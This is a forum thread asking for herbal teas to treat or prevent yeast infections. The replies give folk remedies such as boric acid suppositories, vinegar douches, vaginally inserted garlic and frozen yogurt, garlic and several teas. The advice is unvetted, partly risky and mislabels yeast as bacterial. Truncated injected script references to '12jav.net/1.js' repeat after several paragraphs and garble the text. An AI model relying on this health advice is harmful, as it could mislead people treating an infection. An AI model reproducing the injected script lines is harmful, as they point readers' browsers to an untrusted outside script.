I need some advice about a herb tea that I could use for a bacterial infection particularly yeast infections. My mom is prone to them and so am I. I am looking for a herb to either help clear it up or help prevent them. I know that foods containing good bacteria can help but I don't like eating things like yogurt. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

First and foremost....curb your sugar intake. There are many ways to get rid of a yeast infection. You can make a boric acid suppository that you use vaginally. Sometimes a vinegar and water douche will take care of the problem. You can also try large doses (no more than recommended) of oral garlic. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I've actually heard of inserting a clove of garlic vaginally and going to bed with it during an infection (don't cut it at all! Break off a piece, peel it, and then use it). Also, you can use yogurt vaginally as well, which is full of good bacteria, and will help soothe you. Even better, you can take a latex glove, fill the fingers with yogurt and freeze them. Insert that, and wear a pad.

Garlic is a natural antibiotic, by the way. Eating something with a bit of garlic is a good idea. Soups, garlic bread, pasta... I like to sprinkle a little on a grilled cheese sandwich (powdered garlic is equally effective as fresh).

Onto teas... I did some research for you, and the only ones I found were echinacea, and ginger. Ginger can be pretty spicy, I'd recommend infusing it with another tea, like green tea. You can add ginger to food too. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Found a few more. Lemon balm, and licorice root. Licorice root doesn't taste very great to me x.x but maybe you'll like it. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
